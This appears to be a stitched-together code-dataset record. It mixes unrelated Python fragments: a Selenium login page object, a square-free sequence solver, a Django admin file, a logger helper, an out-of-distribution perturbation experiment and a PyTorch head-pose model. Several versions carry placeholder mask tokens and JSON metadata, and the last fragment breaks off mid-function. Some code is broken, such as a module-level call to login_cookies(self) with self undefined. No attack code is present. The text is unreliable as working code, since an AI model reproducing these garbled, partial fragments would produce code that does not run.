"step-2": "<mask token>\n\n\nclass IndexPage:\n\n def login(self, username, password):\n BasePage.open_url(self, self.base_url)\n BasePage.send_key(self, 'css', '#username', username)\n BasePage.send_key(self, 'css', '#password', password)\n BasePage.click_element(self, 'css', '.ant-btn')\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('../')\n<mask token>\n\n\nclass IndexPage:\n\n def login(self, username, password):\n BasePage.open_url(self, self.base_url)\n BasePage.send_key(self, 'css', '#username', username)\n BasePage.send_key(self, 'css', '#password', password)\n BasePage.click_element(self, 'css', '.ant-btn')\n\n\nif __name__ == '__main__':\n login_cookies(self)\n",
"step-4": "from time import sleep\nimport sys\nsys.path.append('../')\nfrom common.encapsulation import BasePage\n\n\nclass IndexPage:\n\n def login(self, username, password):\n BasePage.open_url(self, self.base_url)\n BasePage.send_key(self, 'css', '#username', username)\n BasePage.send_key(self, 'css', '#password', password)\n BasePage.click_element(self, 'css', '.ant-btn')\n\n\nif __name__ == '__main__':\n login_cookies(self)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: Dang Kai\n# @Date: 2018-10-30 15:52:57\n# @Last Modified time: 2018-11-10 09:09:21\n# @E-mail: [email protected]\n# @Description:\nfrom time import sleep\nimport sys\nsys.path.append('../')\nfrom common.encapsulation import BasePage\n\n\nclass IndexPage:\n\n def login(self, username, password):\n # 登录页面\n BasePage.open_url(self,self.base_url)\n BasePage.send_key(self,'css','#username',username)\n BasePage.send_key(self,'css',\"#password\",password)\n BasePage.click_element(self,\"css\",\".ant-btn\")\n\nif __name__ == '__main__':\n login_cookies(self)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
def solve(bt):
if len(bt) == n:
print(*bt, sep="")
exit()
for i in [1, 2, 3]:
if is_good(bt + [i]):
solve(bt + [i])
def is_good(arr):
for i in range(1, len(arr)//2+1):
if arr[-i:] == arr[-(i*2):-i]:
return False
return True
if __name__ == "__main__":
n = int(input())
solve([1])
|
normal
|
{
"blob_id": "65d5cee6899b0b75474e3898459bf2cfa8b3635b",
"index": 1042,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef is_good(arr):\n for i in range(1, len(arr) // 2 + 1):\n if arr[-i:] == arr[-(i * 2):-i]:\n return False\n return True\n\n\n<mask token>\n",
"step-3": "def solve(bt):\n if len(bt) == n:\n print(*bt, sep='')\n exit()\n for i in [1, 2, 3]:\n if is_good(bt + [i]):\n solve(bt + [i])\n\n\ndef is_good(arr):\n for i in range(1, len(arr) // 2 + 1):\n if arr[-i:] == arr[-(i * 2):-i]:\n return False\n return True\n\n\n<mask token>\n",
"step-4": "def solve(bt):\n if len(bt) == n:\n print(*bt, sep='')\n exit()\n for i in [1, 2, 3]:\n if is_good(bt + [i]):\n solve(bt + [i])\n\n\ndef is_good(arr):\n for i in range(1, len(arr) // 2 + 1):\n if arr[-i:] == arr[-(i * 2):-i]:\n return False\n return True\n\n\nif __name__ == '__main__':\n n = int(input())\n solve([1])\n",
"step-5": "def solve(bt):\n if len(bt) == n:\n print(*bt, sep=\"\")\n exit()\n\n for i in [1, 2, 3]:\n if is_good(bt + [i]):\n solve(bt + [i])\n\n\ndef is_good(arr):\n for i in range(1, len(arr)//2+1):\n if arr[-i:] == arr[-(i*2):-i]:\n return False\n return True\n\nif __name__ == \"__main__\":\n n = int(input())\n\n solve([1])",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
admin.site.register(Profile)
admin.site.register(Category)
admin.site.register(Post)
<|reserved_special_token_1|>
from django.contrib import admin
from blog.models import Post, Category, Profile
admin.site.register(Profile)
admin.site.register(Category)
admin.site.register(Post)
<|reserved_special_token_1|>
from django.contrib import admin
# Register your models here.
from blog.models import Post,Category,Profile
admin.site.register(Profile)
admin.site.register(Category)
admin.site.register(Post)
|
flexible
|
{
"blob_id": "20f0de097fdd8f2a435c06a73c6a90cc7ebc69ad",
"index": 4014,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nadmin.site.register(Profile)\nadmin.site.register(Category)\nadmin.site.register(Post)\n",
"step-3": "from django.contrib import admin\nfrom blog.models import Post, Category, Profile\nadmin.site.register(Profile)\nadmin.site.register(Category)\nadmin.site.register(Post)\n",
"step-4": "from django.contrib import admin\n\n# Register your models here.\nfrom blog.models import Post,Category,Profile\n\nadmin.site.register(Profile)\nadmin.site.register(Category)\nadmin.site.register(Post)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# coding: utf-8
# 2021/5/29 @ tongshiwei
import logging
def get_logger():
_logger = logging.getLogger("EduNLP")
_logger.setLevel(logging.INFO)
_logger.propagate = False
ch = logging.StreamHandler()
ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))
ch.setLevel(logging.INFO)
_logger.addHandler(ch)
return _logger
logger = get_logger()
|
normal
|
{
"blob_id": "41f71589d3fb9f5df218d8ffa0f608a890c73ad2",
"index": 8486,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_logger():\n _logger = logging.getLogger('EduNLP')\n _logger.setLevel(logging.INFO)\n _logger.propagate = False\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))\n ch.setLevel(logging.INFO)\n _logger.addHandler(ch)\n return _logger\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_logger():\n _logger = logging.getLogger('EduNLP')\n _logger.setLevel(logging.INFO)\n _logger.propagate = False\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))\n ch.setLevel(logging.INFO)\n _logger.addHandler(ch)\n return _logger\n\n\nlogger = get_logger()\n",
"step-4": "import logging\n\n\ndef get_logger():\n _logger = logging.getLogger('EduNLP')\n _logger.setLevel(logging.INFO)\n _logger.propagate = False\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))\n ch.setLevel(logging.INFO)\n _logger.addHandler(ch)\n return _logger\n\n\nlogger = get_logger()\n",
"step-5": "# coding: utf-8\n# 2021/5/29 @ tongshiwei\nimport logging\n\n\ndef get_logger():\n _logger = logging.getLogger(\"EduNLP\")\n _logger.setLevel(logging.INFO)\n _logger.propagate = False\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('[%(name)s, %(levelname)s] %(message)s'))\n ch.setLevel(logging.INFO)\n _logger.addHandler(ch)\n return _logger\n\n\nlogger = get_logger()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Test the OOD-detection capabilities of models by scaling a random feature for all sample in the data set.
"""
# STD
import os
import pickle
from copy import deepcopy
from collections import defaultdict
import argparse
from typing import Tuple, Dict, List
# EXT
import numpy as np
from tqdm import tqdm
import torch
# PROJECT
from uncertainty_estimation.utils.model_init import AVAILABLE_MODELS
from uncertainty_estimation.utils.model_init import init_models
from uncertainty_estimation.utils.datahandler import DataHandler
from uncertainty_estimation.utils.novelty_analyzer import NoveltyAnalyzer
# CONST
SCALES = [10, 100, 1000, 10000]
N_FEATURES = 100
RESULT_DIR = "../../data/results"
def run_perturbation_experiment(
nov_an: NoveltyAnalyzer, X_test: np.ndarray, scoring_func: str = None
) -> Tuple[Dict[str, List[float]], Dict[str, List[float]]]:
"""Runs the perturbation experiment for a single novelty estimator.
Parameters
----------
nov_an: NoveltyAnalyzer
The novelty analyzer (handles scaling, imputation, evaluation)
X_test: np.ndarray
The test data to use
scoring_func: str
Which kind of novelty to evaluate (used for NN ensemble, where you can choose between
'std' and 'entropy'
Returns
-------
aucs_dict: dict
a dictionary of lists of OOD detection AUCS for different scales. The list contains the
detection AUCs for the same scale but different features.
recall_dict: dict
a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The
list contains the recalls for the same scale but different features.
"""
aucs_dict = defaultdict(list)
recall_dict = defaultdict(list)
for scale_adjustment in tqdm(SCALES):
random_sample = np.random.choice(
np.arange(0, X_test.shape[1]), N_FEATURES, replace=False
)
for r in random_sample:
X_test_adjusted = deepcopy(nov_an.X_test)
X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment
nov_an.set_ood(X_test_adjusted, impute_and_scale=False)
nov_an.calculate_novelty(scoring_func=scoring_func)
aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]
recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]
return aucs_dict, recall_dict
if __name__ == "__main__":
np.random.seed(123)
torch.manual_seed(123)
parser = argparse.ArgumentParser()
parser.add_argument(
"--data_origin", type=str, default="MIMIC", help="Which data to use"
)
parser.add_argument(
"--models",
type=str,
nargs="+",
default=AVAILABLE_MODELS,
choices=AVAILABLE_MODELS,
help="Determine the models which are being used for this experiment.",
)
parser.add_argument(
"--result_dir",
type=str,
default=RESULT_DIR,
help="Define the directory that results should be saved to.",
)
args = parser.parse_args()
# Loading the data
dh = DataHandler(args.data_origin)
feature_names = dh.load_feature_names()
train_data, test_data, val_data = dh.load_data_splits()
y_name = dh.load_target_name()
for ne, scoring_funcs, name in init_models(
input_dim=len(feature_names), selection=args.models, origin=args.data_origin
):
print(name)
nov_an = NoveltyAnalyzer(
ne,
train_data[feature_names].values,
test_data[feature_names].values,
val_data[feature_names].values,
train_data[y_name].values,
test_data[y_name].values,
val_data[y_name].values,
)
nov_an.train()
for scoring_func in scoring_funcs:
aucs_dict, recall_dict = run_perturbation_experiment(
nov_an, test_data[feature_names], scoring_func=scoring_func
)
dir_name = os.path.join(
args.result_dir,
args.data_origin,
"perturbation",
name,
"detection",
scoring_func,
)
if not os.path.exists(dir_name):
os.makedirs(dir_name)
with open(os.path.join(dir_name, "recall.pkl"), "wb") as f:
pickle.dump(recall_dict, f)
with open(os.path.join(dir_name, "detect_auc.pkl"), "wb") as f:
pickle.dump(aucs_dict, f)
|
normal
|
{
"blob_id": "bf3e7f1aa9fd20b69e751da9ac8970c88b1144eb",
"index": 9363,
"step-1": "<mask token>\n\n\ndef run_perturbation_experiment(nov_an: NoveltyAnalyzer, X_test: np.ndarray,\n scoring_func: str=None) ->Tuple[Dict[str, List[float]], Dict[str, List[\n float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n -------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(np.arange(0, X_test.shape[1]),\n N_FEATURES, replace=False)\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n return aucs_dict, recall_dict\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef run_perturbation_experiment(nov_an: NoveltyAnalyzer, X_test: np.ndarray,\n scoring_func: str=None) ->Tuple[Dict[str, List[float]], Dict[str, List[\n float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n -------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(np.arange(0, X_test.shape[1]),\n N_FEATURES, replace=False)\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n return aucs_dict, recall_dict\n\n\nif __name__ == '__main__':\n np.random.seed(123)\n torch.manual_seed(123)\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_origin', type=str, default='MIMIC', help=\n 'Which data to use')\n parser.add_argument('--models', type=str, nargs='+', default=\n AVAILABLE_MODELS, choices=AVAILABLE_MODELS, help=\n 'Determine the models which are being used for this experiment.')\n parser.add_argument('--result_dir', type=str, 
default=RESULT_DIR, help=\n 'Define the directory that results should be saved to.')\n args = parser.parse_args()\n dh = DataHandler(args.data_origin)\n feature_names = dh.load_feature_names()\n train_data, test_data, val_data = dh.load_data_splits()\n y_name = dh.load_target_name()\n for ne, scoring_funcs, name in init_models(input_dim=len(feature_names),\n selection=args.models, origin=args.data_origin):\n print(name)\n nov_an = NoveltyAnalyzer(ne, train_data[feature_names].values,\n test_data[feature_names].values, val_data[feature_names].values,\n train_data[y_name].values, test_data[y_name].values, val_data[\n y_name].values)\n nov_an.train()\n for scoring_func in scoring_funcs:\n aucs_dict, recall_dict = run_perturbation_experiment(nov_an,\n test_data[feature_names], scoring_func=scoring_func)\n dir_name = os.path.join(args.result_dir, args.data_origin,\n 'perturbation', name, 'detection', scoring_func)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n with open(os.path.join(dir_name, 'recall.pkl'), 'wb') as f:\n pickle.dump(recall_dict, f)\n with open(os.path.join(dir_name, 'detect_auc.pkl'), 'wb') as f:\n pickle.dump(aucs_dict, f)\n",
"step-3": "<mask token>\nSCALES = [10, 100, 1000, 10000]\nN_FEATURES = 100\nRESULT_DIR = '../../data/results'\n\n\ndef run_perturbation_experiment(nov_an: NoveltyAnalyzer, X_test: np.ndarray,\n scoring_func: str=None) ->Tuple[Dict[str, List[float]], Dict[str, List[\n float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n -------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(np.arange(0, X_test.shape[1]),\n N_FEATURES, replace=False)\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n return aucs_dict, recall_dict\n\n\nif __name__ == '__main__':\n np.random.seed(123)\n torch.manual_seed(123)\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_origin', type=str, default='MIMIC', help=\n 'Which data to use')\n parser.add_argument('--models', type=str, nargs='+', default=\n AVAILABLE_MODELS, choices=AVAILABLE_MODELS, help=\n 'Determine the models which are being 
used for this experiment.')\n parser.add_argument('--result_dir', type=str, default=RESULT_DIR, help=\n 'Define the directory that results should be saved to.')\n args = parser.parse_args()\n dh = DataHandler(args.data_origin)\n feature_names = dh.load_feature_names()\n train_data, test_data, val_data = dh.load_data_splits()\n y_name = dh.load_target_name()\n for ne, scoring_funcs, name in init_models(input_dim=len(feature_names),\n selection=args.models, origin=args.data_origin):\n print(name)\n nov_an = NoveltyAnalyzer(ne, train_data[feature_names].values,\n test_data[feature_names].values, val_data[feature_names].values,\n train_data[y_name].values, test_data[y_name].values, val_data[\n y_name].values)\n nov_an.train()\n for scoring_func in scoring_funcs:\n aucs_dict, recall_dict = run_perturbation_experiment(nov_an,\n test_data[feature_names], scoring_func=scoring_func)\n dir_name = os.path.join(args.result_dir, args.data_origin,\n 'perturbation', name, 'detection', scoring_func)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n with open(os.path.join(dir_name, 'recall.pkl'), 'wb') as f:\n pickle.dump(recall_dict, f)\n with open(os.path.join(dir_name, 'detect_auc.pkl'), 'wb') as f:\n pickle.dump(aucs_dict, f)\n",
"step-4": "<mask token>\nimport os\nimport pickle\nfrom copy import deepcopy\nfrom collections import defaultdict\nimport argparse\nfrom typing import Tuple, Dict, List\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nfrom uncertainty_estimation.utils.model_init import AVAILABLE_MODELS\nfrom uncertainty_estimation.utils.model_init import init_models\nfrom uncertainty_estimation.utils.datahandler import DataHandler\nfrom uncertainty_estimation.utils.novelty_analyzer import NoveltyAnalyzer\nSCALES = [10, 100, 1000, 10000]\nN_FEATURES = 100\nRESULT_DIR = '../../data/results'\n\n\ndef run_perturbation_experiment(nov_an: NoveltyAnalyzer, X_test: np.ndarray,\n scoring_func: str=None) ->Tuple[Dict[str, List[float]], Dict[str, List[\n float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n -------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. 
The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(np.arange(0, X_test.shape[1]),\n N_FEATURES, replace=False)\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n return aucs_dict, recall_dict\n\n\nif __name__ == '__main__':\n np.random.seed(123)\n torch.manual_seed(123)\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_origin', type=str, default='MIMIC', help=\n 'Which data to use')\n parser.add_argument('--models', type=str, nargs='+', default=\n AVAILABLE_MODELS, choices=AVAILABLE_MODELS, help=\n 'Determine the models which are being used for this experiment.')\n parser.add_argument('--result_dir', type=str, default=RESULT_DIR, help=\n 'Define the directory that results should be saved to.')\n args = parser.parse_args()\n dh = DataHandler(args.data_origin)\n feature_names = dh.load_feature_names()\n train_data, test_data, val_data = dh.load_data_splits()\n y_name = dh.load_target_name()\n for ne, scoring_funcs, name in init_models(input_dim=len(feature_names),\n selection=args.models, origin=args.data_origin):\n print(name)\n nov_an = NoveltyAnalyzer(ne, train_data[feature_names].values,\n test_data[feature_names].values, val_data[feature_names].values,\n train_data[y_name].values, test_data[y_name].values, val_data[\n y_name].values)\n nov_an.train()\n for scoring_func 
in scoring_funcs:\n aucs_dict, recall_dict = run_perturbation_experiment(nov_an,\n test_data[feature_names], scoring_func=scoring_func)\n dir_name = os.path.join(args.result_dir, args.data_origin,\n 'perturbation', name, 'detection', scoring_func)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n with open(os.path.join(dir_name, 'recall.pkl'), 'wb') as f:\n pickle.dump(recall_dict, f)\n with open(os.path.join(dir_name, 'detect_auc.pkl'), 'wb') as f:\n pickle.dump(aucs_dict, f)\n",
"step-5": "\"\"\"\nTest the OOD-detection capabilities of models by scaling a random feature for all sample in the data set.\n\"\"\"\n\n# STD\nimport os\nimport pickle\nfrom copy import deepcopy\nfrom collections import defaultdict\nimport argparse\nfrom typing import Tuple, Dict, List\n\n# EXT\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\n\n# PROJECT\nfrom uncertainty_estimation.utils.model_init import AVAILABLE_MODELS\nfrom uncertainty_estimation.utils.model_init import init_models\nfrom uncertainty_estimation.utils.datahandler import DataHandler\nfrom uncertainty_estimation.utils.novelty_analyzer import NoveltyAnalyzer\n\n# CONST\nSCALES = [10, 100, 1000, 10000]\nN_FEATURES = 100\nRESULT_DIR = \"../../data/results\"\n\n\ndef run_perturbation_experiment(\n nov_an: NoveltyAnalyzer, X_test: np.ndarray, scoring_func: str = None\n) -> Tuple[Dict[str, List[float]], Dict[str, List[float]]]:\n \"\"\"Runs the perturbation experiment for a single novelty estimator.\n\n Parameters\n ----------\n nov_an: NoveltyAnalyzer\n The novelty analyzer (handles scaling, imputation, evaluation)\n X_test: np.ndarray\n The test data to use\n scoring_func: str\n Which kind of novelty to evaluate (used for NN ensemble, where you can choose between\n 'std' and 'entropy'\n\n Returns\n -------\n aucs_dict: dict\n a dictionary of lists of OOD detection AUCS for different scales. 
The list contains the\n detection AUCs for the same scale but different features.\n recall_dict: dict\n a dictionary of lists of recalled OOD fractions using the 95th percentile cutoff.The\n list contains the recalls for the same scale but different features.\n\n \"\"\"\n aucs_dict = defaultdict(list)\n recall_dict = defaultdict(list)\n\n for scale_adjustment in tqdm(SCALES):\n random_sample = np.random.choice(\n np.arange(0, X_test.shape[1]), N_FEATURES, replace=False\n )\n\n for r in random_sample:\n X_test_adjusted = deepcopy(nov_an.X_test)\n X_test_adjusted[:, r] = X_test_adjusted[:, r] * scale_adjustment\n nov_an.set_ood(X_test_adjusted, impute_and_scale=False)\n nov_an.calculate_novelty(scoring_func=scoring_func)\n aucs_dict[scale_adjustment] += [nov_an.get_ood_detection_auc()]\n recall_dict[scale_adjustment] += [nov_an.get_ood_recall()]\n\n return aucs_dict, recall_dict\n\n\nif __name__ == \"__main__\":\n np.random.seed(123)\n torch.manual_seed(123)\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--data_origin\", type=str, default=\"MIMIC\", help=\"Which data to use\"\n )\n parser.add_argument(\n \"--models\",\n type=str,\n nargs=\"+\",\n default=AVAILABLE_MODELS,\n choices=AVAILABLE_MODELS,\n help=\"Determine the models which are being used for this experiment.\",\n )\n parser.add_argument(\n \"--result_dir\",\n type=str,\n default=RESULT_DIR,\n help=\"Define the directory that results should be saved to.\",\n )\n args = parser.parse_args()\n\n # Loading the data\n dh = DataHandler(args.data_origin)\n feature_names = dh.load_feature_names()\n train_data, test_data, val_data = dh.load_data_splits()\n y_name = dh.load_target_name()\n\n for ne, scoring_funcs, name in init_models(\n input_dim=len(feature_names), selection=args.models, origin=args.data_origin\n ):\n print(name)\n nov_an = NoveltyAnalyzer(\n ne,\n train_data[feature_names].values,\n test_data[feature_names].values,\n val_data[feature_names].values,\n train_data[y_name].values,\n 
test_data[y_name].values,\n val_data[y_name].values,\n )\n nov_an.train()\n\n for scoring_func in scoring_funcs:\n aucs_dict, recall_dict = run_perturbation_experiment(\n nov_an, test_data[feature_names], scoring_func=scoring_func\n )\n\n dir_name = os.path.join(\n args.result_dir,\n args.data_origin,\n \"perturbation\",\n name,\n \"detection\",\n scoring_func,\n )\n\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n with open(os.path.join(dir_name, \"recall.pkl\"), \"wb\") as f:\n pickle.dump(recall_dict, f)\n\n with open(os.path.join(dir_name, \"detect_auc.pkl\"), \"wb\") as f:\n pickle.dump(aucs_dict, f)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,
bias=False)
self.sigmoid = nn.Sigmoid()
<|reserved_special_token_0|>
class PYRModule(nn.Module):
def __init__(self, inplanes, downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))
def forward(self, x):
x = self.ca(x) * x
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num = 1792
self.cls_num = 66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1
) * 1).cuda()
self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.max_pool_1 = nn.MaxPool1d(3)
self.max_pool_2 = nn.MaxPool1d(3)
self.max_pool_3 = nn.MaxPool1d(3)
self.softmax = nn.Softmax(dim=2).cuda()
self.sigmoid = nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat = torch.unsqueeze(x_p, 1)
x_y_feat = torch.unsqueeze(x_y, 1)
x_r_feat = torch.unsqueeze(x_r, 1)
x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)
x_p_b = self.fc_b_1(x_p)
x_y_b = self.fc_b_2(x_y)
x_r_b = self.fc_b_3(x_r)
x_p_b = torch.unsqueeze(x_p_b, 1)
x_y_b = torch.unsqueeze(x_y_b, 1)
x_r_b = torch.unsqueeze(x_r_b, 1)
x_p_b_mp = self.max_pool_1(x_p_b)
x_y_b_mp = self.max_pool_2(x_y_b)
x_r_b_mp = self.max_pool_3(x_r_b)
x_p_pre = self.softmax(x_p_b)
x_y_pre = self.softmax(x_y_b)
x_r_pre = self.softmax(x_r_b)
x_p = torch.sum(x_p_pre * self.idx_tensor, 2)
x_y = torch.sum(x_y_pre * self.idx_tensor, 2)
x_r = torch.sum(x_r_pre * self.idx_tensor, 2)
return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,
x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChannelAttention(nn.Module):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class SpatialAttention(nn.Module):
def __init__(self, kernel_size=7):
super(SpatialAttention, self).__init__()
self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,
bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
avg_out = torch.mean(x, dim=1, keepdim=True)
max_out, _ = torch.max(x, dim=1, keepdim=True)
x = torch.cat([avg_out, max_out], dim=1)
x = self.conv1(x)
return self.sigmoid(x)
class PYRModule(nn.Module):
def __init__(self, inplanes, downsample=None):
super(PYRModule, self).__init__()
self.ca = ChannelAttention(inplanes)
self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))
def forward(self, x):
x = self.ca(x) * x
x = self.features(x)
return x
class HPNet(nn.Module):
def __init__(self):
super(HPNet, self).__init__()
self.faceModel = efn.from_pretrained('efficientnet-b4')
self.planes_num = 1792
self.cls_num = 66
self.feature_1 = PYRModule(self.planes_num)
self.feature_2 = PYRModule(self.planes_num)
self.feature_3 = PYRModule(self.planes_num)
self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1
) * 1).cuda()
self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))
self.max_pool_1 = nn.MaxPool1d(3)
self.max_pool_2 = nn.MaxPool1d(3)
self.max_pool_3 = nn.MaxPool1d(3)
self.softmax = nn.Softmax(dim=2).cuda()
self.sigmoid = nn.Sigmoid().cuda()
def forward(self, faces):
xFace = self.faceModel.extract_features(faces)
x_p = self.feature_1(xFace)
x_y = self.feature_2(xFace)
x_r = self.feature_3(xFace)
x_p = torch.flatten(x_p, 1)
x_y = torch.flatten(x_y, 1)
x_r = torch.flatten(x_r, 1)
x_p_feat = torch.unsqueeze(x_p, 1)
x_y_feat = torch.unsqueeze(x_y, 1)
x_r_feat = torch.unsqueeze(x_r, 1)
x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)
